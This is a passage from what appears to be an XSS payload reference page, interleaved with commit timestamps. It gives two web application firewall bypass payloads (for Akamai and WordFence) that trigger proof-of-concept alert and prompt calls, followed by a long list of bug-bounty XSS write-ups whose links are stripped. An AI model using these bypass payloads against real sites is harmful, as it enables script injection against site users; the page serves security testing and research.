2018-06-27 18:00:17 +00:00
2019-01-10 21:36:30 +00:00
### Akamai WAF Bypass by [@s0md3v]( - 28th october 2018
2018-10-29 21:22:10 +00:00
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
2019-01-10 21:36:30 +00:00
### WordFence WAF Bypass by [@brutelogic]( - 12th september 2018
2018-09-21 16:44:32 +00:00
<a href=javas&#99;ript:alert(1)>
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
- [Unleashing-an-Ultimate-XSS-Polyglot](
- tbm
- [(Relative Path Overwrite) RPO XSS - Infinite Security](
- [RPO TheSpanner](
- [RPO Gadget - innerthmtl](
2018-08-13 10:01:13 +00:00
- [Relative Path Overwrite - Detectify](
- [XSS ghettoBypass - d3adend](
- [XSS without HTML: Client-Side Template Injection with AngularJS](
- [XSSING WEB PART - 2 - Rakesh Mane](
- [Making an XSS triggered by CSP bypass on Twitter. @tbmnull](
- [Ways to alert(document.domain) - @tomnomnom](
- [D1T1 - Michele Spagnuolo and Lukas Wilschelbaum - So We Broke All CSPs](
- [Sleeping stored Google XSS Awakens a $5000 Bounty]( by Patrik Fehrenbach
- [RPO that lead to information leakage in Google]( by filedescriptor
- [God-like XSS, Log-in, Log-out, Log-in]( in Uber by Jack Whitton
- [Three Stored XSS in Facebook]( by Nirgoldshlager
- [Using a Braun Shaver to Bypass XSS Audit and WAF]( by Frans Rosen
- [An XSS on Facebook via PNGs & Wonky Content Types]( by Jack Whitton
- [Stored XSS in *]( by Jack Whitton
- [Complicated, Best Report of Google XSS]( by Ramzes
- [Tricky Html Injection and Possible XSS in]( by secgeek
- [Command Injection in Google Console]( by Venkat S
- [Facebook's Moves - OAuth XSS]( by PAULOS YIBELO
- [Stored XSS in Google Docs (Bug Bounty)]( by Harry M Gertos
- [Stored XSS on via admin account compromise in Uber]( by James Kettle (albinowax)
- [Yahoo Mail stored XSS]( by Klikki Oy
- [Abusing XSS Filter: One ^ leads to XSS(CVE-2016-3212)]( by Masato Kinugawa
- [Youtube XSS]( by fransrosen
- [Best Google XSS again]( - by Krzysztof Kotowicz
- [IE & Edge URL parsin Problem]( - by detectify
- [Google XSS subdomain Clickjacking](
- [Microsoft XSS and Twitter XSS](
- [Google Japan Book XSS](
- [Flash XSS mega nz]( - by frans
- [Flash XSS in multiple libraries]( - by Olivier Beg
- [xss in google IE, Host Header Reflection](
- [Years ago Google xss](
- [xss in google by IE weird behavior](
- [xss in Yahoo Fantasy Sport](
- [xss in Yahoo Mail Again, worth $10000]( by Klikki Oy
- [Sleeping XSS in Google]( by securityguard
- [Decoding a .htpasswd to earn a payload of money]( by securityguard
- [Google Account Takeover](
- [AirBnb Bug Bounty: Turning Self-XSS into Good-XSS #2]( by geekboy
- [Uber Self XSS to Global XSS](
- [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf)]( by Marin MoulinierFollow
- [Airbnb When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities]( by Brett
- [XSSI, Client Side Brute Force](
2019-08-03 21:22:14 +00:00
- [postMessage XSS on a million sites - December 15, 2016 - Mathias Karlsson](
- [postMessage XSS Bypass](
- [XSS in Uber via Cookie]( by zhchbin
- [Stealing contact form data on using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP]( by frans
- [XSS due to improper regex in third party js Uber 7k XSS](
- [XSS in TinyMCE 2.4.0]( by Jelmer de Hen
- [Pass uncoded URL in IE11 to cause XSS](
- [Twitter XSS by stopping redirection and javascript scheme]( by Sergey Bobrov
- [Auth DOM Uber XSS](
- [Managed Apps and Music: two Google reflected XSSes](
- [App Maker and Colaboratory: two Google stored XSSes](
- [XSS in](
- [Stored XSS, and SSRF in Google using the Dataset Publishing Language](
2019-08-28 17:56:55 +00:00
- [Stored XSS on Snapchat](
2019-11-06 17:32:29 +00:00
- [XSS cheat sheet - PortSwigger](
- [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](
2020-05-06 18:27:55 +00:00
- [Self Closing Script](